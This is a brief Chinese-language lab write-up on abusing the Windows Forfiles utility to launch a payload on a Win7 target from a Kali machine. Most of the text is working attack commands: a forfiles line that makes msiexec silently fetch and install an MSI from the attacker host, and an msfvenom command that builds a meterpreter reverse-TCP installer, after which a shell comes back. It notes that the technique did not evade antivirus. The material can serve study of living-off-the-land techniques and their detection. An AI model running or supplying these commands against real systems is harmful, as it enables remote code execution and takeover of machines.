0x00 Forfiles简介:
Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。
0x01 环境
攻击机 kali 192.168.5.100
靶机 win7 192.168.5.101
装有av
0x02复现
攻击机
靶机
forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i http://192.168.5.100/shellcode.msi"
shell弹回
0x03 shellcode.msi
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f msi > shellcode.msi
启用80监听
0x04 总结
不过AV。
0x05 借鉴
https://micro8.github.io/Micro8-HTML/Chapter1/81-90/84_基于白名单Forfiles执行payload第十四季.html